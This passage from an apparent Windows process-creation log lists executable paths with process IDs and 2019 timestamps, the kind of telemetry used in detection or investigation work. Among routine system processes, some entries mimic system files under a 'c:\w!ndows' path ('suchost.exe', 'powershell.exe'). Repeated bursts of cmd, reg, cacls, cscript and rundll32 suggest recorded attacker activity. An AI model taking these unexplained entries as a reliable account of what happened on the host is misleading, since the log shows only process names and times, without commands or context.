state\\\\resources\\\\884\\\\pmfexe.exe0x154c2019-02-10 13:48:32.323000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x12382019-02-10 13:48:32.333000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xc602019-02-10 14:05:36.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x13c02019-02-10 14:05:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x6382019-02-10 14:15:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x115c2019-02-10 14:15:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15fc2019-02-10 14:45:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x16a82019-02-10 14:45:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x1d382019-02-10 14:48:32.337000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x6842019-02-10 14:48:32.347000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x17b02019-02-10 14:55:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x13302019-02-10 14:55:36.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x17d02019-02-10 15:15:36.273000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1ff82019-02-10 15:15:36.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x1fd02019-02-10 15:45:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xf802019-02-10 15:45:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x21202019-02-10 15:45:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x239c2019-02-10 15:45:36.270000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x15702019-02-10 00:45:28.263000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x16002019-02-10 00:45:28.490000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe0x17f02019-02-10 00:45:29.077000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe0x11ec2019-02-10 00:45:30.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe0xa982019-02-10 00:45:31.260000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x6282019-02-10 00:45:32.330000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe0x1d402019-02-10 00:45:33.173000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0xbe42019-02-10 01:15:13.177000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x16402019-02-10 02:16:01.743000\",\"c:\\\\windows\\\\system32\\\\installagent.exe0x16e02019-02-10 02:37:21.880000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x13a82019-02-10 03:16:50.323000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x7f82019-02-10 04:17:37.760000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x16bc2019-02-10 05:18:26.910000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x1b742019-02-10 06:19:15.563000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x10942019-02-10 08:20:53.907000\",\"c:\\\\windows\\\\system32\\\\installagent.exe0xb42019-02-10 09:07:02.893000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x5a82019-02-10 09:21:42.453000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0xc4c2019-02-09 20:35:53.157000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x20642019-02-09 22:12:25.910000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x1f202019-02-09 22:12:36.240000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0xefc2019-02-10 10:22:30.507000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x19ac2019-02-10 11:23:18.607000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x10042019-02-10 12:24:07.077000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x212c2019-02-09 22:35:53.157000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x12082019-02-10 13:24:54.533000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x3f82019-02-10 14:25:43.080000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x21782019-02-10 15:26:31.813000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x7981970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14ec2019-02-09 20:05:31.010000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x48c2019-02-09 20:05:31.020000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x4902019-02-09 23:26:47.740000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13602019-02-09 23:26:47.923000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe502019-02-09 23:26:47.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17482019-02-09 23:26:47.950000\",\"c:\\\\w!ndows\\\\system32\\\\suchost.exe0x15842019-02-09 23:26:48.073000\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe0x12bc2019-02-09 23:26:48.093000\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe0x12602019-02-09 23:26:48.107000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23482019-02-09 23:26:48.120000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x14882019-02-09 23:28:02.250000\",\"c:\\\\windows\\\\system32\\\\speech_onecore\\\\common\\\\speechmodeldownload.exe0x1e3c2019-02-10 00:00:00.770000\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe0x19282019-02-10 00:00:00.800000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x9ac2019-02-10 00:28:02.250000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x23782019-02-09 21:28:02.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x4b82019-02-10 00:44:47.253000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ca42019-02-10 00:44:47.433000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a442019-02-10 00:44:47.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19842019-02-10 00:44:47.463000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x10042019-02-10 00:44:54.540000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19402019-02-10 00:44:54.557000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x8542019-02-10 00:45:10.707000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd6c2019-02-10 00:45:10.730000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd742019-02-10 00:45:10.743000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x12482019-02-10 00:45:11.300000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x22282019-02-10 00:45:11.340000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x13482019-02-10 00:45:11.390000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1f602019-02-10 00:45:11.440000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x17b02019-02-10 00:45:11.490000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x5182019-02-10 00:45:11.540000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x4942019-02-10 00:45:11.590000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x15842019-02-10 00:45:11.640000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8c02019-02-10 00:45:11.690000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xde42019-02-10 00:45:11.763000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x23682019-02-10 00:45:12.290000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21f82019-02-10 00:45:12.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x38c2019-02-10 00:45:12.727000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xc4c2019-02-10 00:45:12.747000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xc982019-02-10 00:45:25.893000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x8c42019-02-10 00:45:25.910000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x16e02019-02-10 00:45:40.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6842019-02-10 00:45:40.470000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x13982019-02-10 00:45:53.590000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xeac2019-02-10 00:45:53.627000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x3942019-02-10 00:46:06.780000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1f602019-02-10 00:46:06.810000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x19042019-02-10 00:46:19.930000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x16142019-02-10 00:46:19.950000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8342019-02-10 00:46:33.137000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xf3c2019-02-10 00:46:33.167000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x23882019-02-10 00:46:46.277000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xe102019-02-10 00:46:46.293000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x16d42019-02-10 00:46:59.423000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xbe42019-02-10 00:46:59.450000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x12802019-02-10 00:47:12.563000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x14ec2019-02-10 00:47:12.593000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x22c02019-02-10 00:47:25.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1b642019-02-10 00:47:25.740000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x20802019-02-10 00:47:38.850000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23ec2019-02-10 00:47:38.887000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x10a82019-02-10 00:47:52.007000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x4902019-02-10 00:47:52.020000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x203c2019-02-10 00:48:05.117000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21b02019-02-10 00:48:05.143000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xb002019-02-10 00:48:18.287000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1d382019-02-10 00:48:18.353000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xfcc2019-02-10 00:48:18.367000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x21c82019-02-10 00:48:18.387000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x94c2019-02-10 00:48:18.443000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x7fc2019-02-10 00:48:37.320000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x8f82019-02-10 00:48:37.347000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x12502019-02-10 00:48:59.900000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1c842019-02-10 00:48:59.923000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1d342019-02-10 00:49:13.023000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17042019-02-10 00:49:13.053000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x21d42019-02-10 00:49:30.207000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x8342019-02-10 00:49:30.227000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1fd02019-02-10 00:49:57.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xcc82019-02-10 00:49:57.533000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xb482019-02-10 00:50:10.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18342019-02-10 00:50:10.677000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x21642019-02-10 00:50:26.817000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19c82019-02-10 00:50:26.837000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x20802019-02-10 00:50:52.073000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ed42019-02-10 00:50:52.440000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x20082019-02-10 00:50:52.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10402019-02-10 00:50:52.467000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xd802019-02-10 00:51:17.663000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19a82019-02-10 00:51:17.687000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x17d82019-02-10 00:51:42.923000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21c82019-02-10 00:51:43.013000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1be02019-02-10 00:52:08.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xccc2019-02-10 00:52:09.227000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17a42019-02-10 00:52:09.243000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x19842019-02-10 00:52:09.277000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x1ca42019-02-10 00:52:09.290000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1a442019-02-10 00:52:09.307000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x7fc2019-02-10 00:52:09.357000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x1b102019-02-10 00:52:09.383000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xe042019-02-10 00:52:09.403000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x12f82019-02-10 00:52:09.427000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x21702019-02-10 00:52:09.440000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1bc02019-02-10 00:52:09.460000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xa242019-02-10 00:52:09.487000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x22a82019-02-10 00:52:09.503000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x3942019-02-10 00:52:09.547000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x8f82019-02-10 00:52:09.557000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x12502019-02-10 00:52:09.607000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23642019-02-10 00:52:09.663000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x9ec2019-02-10 00:52:34.923000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12602019-02-10 00:52:34.963000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xe082019-02-10 00:53:00.197000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23d42019-02-10 00:53:00.220000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xb42019-02-10 00:53:25.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12782019-02-10 00:53:25.473000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x53c2019-02-10 00:53:50.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x9742019-02-10 00:53:50.740000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x17202019-02-10 00:54:15.967000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1fc02019-02-10 00:54:15.990000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1af02019-02-10 00:54:41.217000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1ea02019-02-10 00:54:41.247000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x18502019-02-10 00:55:06.503000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x11f02019-02-10 00:55:06.520000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x19282019-02-10 00:55:31.747000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c202019-02-10 00:55:32.707000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d082019-02-10 00:55:32.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xed42019-02-10 00:55:32.740000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xe502019-02-10 00:55:57.930000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6842019-02-10 00:55:57.947000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xf582019-02-10 00:56:23.183000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13e02019-02-10 00:56:23.203000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xcc02019-02-10 00:56:48.420000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x3c42019-02-10 00:56:48.490000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x19142019-02-10 00:57:13.700000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xc142019-02-10 00:57:13.730000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xe602019-02-10 00:57:38.920000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19902019-02-10 00:57:38.940000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x14202019-02-10 00:58:04.147000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1d902019-02-10 00:58:04.180000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x15c82019-02-10 00:58:29.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xfcc2019-02-10 00:58:29.463000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x17a82019-02-10 00:58:54.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x212c2019-02-10 00:58:54.673000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8c42019-02-10 00:59:19.897000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1c242019-02-10 00:59:19.930000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x12502019-02-10 00:59:45.177000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1d9c2019-02-10 00:59:45.200000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xc4c2019-02-10 01:00:10.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6482019-02-10 01:00:10.500000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x12e02019-02-10 01:00:35.720000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xbe42019-02-10 01:00:35.747000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xc1c2019-02-10 01:01:01.007000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x203c2019-02-10 01:01:01.030000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1e8c2019-02-10 01:01:26.257000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xc802019-02-10 01:01:26.323000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x10802019-02-10 01:01:51.563000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1e442019-02-10 01:01:51.587000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x18042019-02-10 01:02:16.817000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1e302019-02-10 01:02:16.843000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xd742019-02-10 01:02:42.083000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x162c2019-02-10 01:02:42.147000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xcec2019-02-10 01:03:10.360000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10d02019-02-10 01:03:10.380000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1d542019-02-10 01:03:17.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23d42019-02-10 01:03:17.473000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x12c42019-02-10 01:03:35.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x18682019-02-09 21:44:46.750000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x5942019-02-09 21:44:46.923000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x20802019-02-09 21:44:46.937000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23e82019-02-09 21:44:46.950000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xc682019-02-09 21:44:52.010000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x67c2019-02-09 21:44:52.027000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xf802019-02-09 21:56:28.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xd982019-02-09 21:56:28.403000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6c02019-02-09 21:56:28.413000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17d82019-02-09 21:56:28.427000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xdb02019-02-09 21:56:35.493000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x7702019-02-09 21:56:35.510000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xfcc2019-02-09 21:56:43.593000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17142019-02-09 21:56:43.613000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd602019-02-09 21:56:45.653000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xf082019-02-09 21:56:46.590000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x22a82019-02-09 21:56:46.607000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x5942019-02-09 21:56:46.623000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x11cc2019-02-09 21:56:46.640000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x8502019-02-09 21:56:46.667000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x23842019-02-09 21:56:46.677000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xda42019-02-09 21:56:46.690000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1e442019-02-09 21:56:46.700000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x17702019-02-09 21:56:46.713000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x12cc2019-02-09 21:56:46.740000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xbd02019-02-09 21:56:46.753000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x67c2019-02-09 21:56:46.767000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1b502019-02-09 21:56:46.780000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xfd42019-02-09 21:56:46.793000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x16e02019-02-09 21:56:46.840000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8c42019-02-09 21:56:56.933000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1ac42019-02-09 21:56:56.957000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x22782019-02-09 21:57:25.140000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x154c2019-02-09 21:57:25.160000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12bc2019-02-09 22:02:05.287000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x17342019-02-09 22:02:26.477000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x123c2019-02-09 22:02:26.493000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x5502019-02-09 22:02:27.520000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x16802019-02-09 22:02:27.543000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xc982019-02-09 22:02:28.570000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x16fc2019-02-09 20:28:02.213000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x5ac2019-02-10 01:28:02.250000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe0x17702019-02-10 01:48:41.643000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x21f42019-02-10 01:48:41.673000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0xfe02019-02-10 02:28:02.243000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe0x17ac2019-02-10 02:37:21.853000\",\"c:\\\\windows\\\\system32\\\\apphostregistrationverifier.exe0x1e682019-02-10 03:00:00.720000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe0x53c2019-02-10 03:06:45.883000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x107c2019-02-10 03:06:45.900000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x19342019-02-10 03:28:02.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xfbc2019-02-10 03:44:47.260000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x2d02019-02-10 03:44:47.453000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x5c2019-02-10 03:44:47.470000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23a42019-02-10 03:44:47.487000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x11f02019-02-10 03:44:57.607000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb002019-02-10 03:44:57.623000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xb482019-02-10 03:45:14.760000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20682019-02-10 03:45:14.783000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x16e82019-02-10 03:45:32.930000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe602019-02-10 03:45:33.873000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1fe82019-02-10 03:45:33.890000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x107c2019-02-10 03:45:33.920000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x9f02019-02-10 03:45:33.937000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x9742019-02-10 03:45:33.967000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x23782019-02-10 03:45:34.187000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x10042019-02-10 03:45:34.213000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8482019-02-10 03:45:34.233000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x162c2019-02-10 03:45:34.260000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1ce42019-02-10 03:45:34.270000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1be02019-02-10 03:45:34.290000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xd742019-02-10 03:45:34.317000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1d442019-02-10 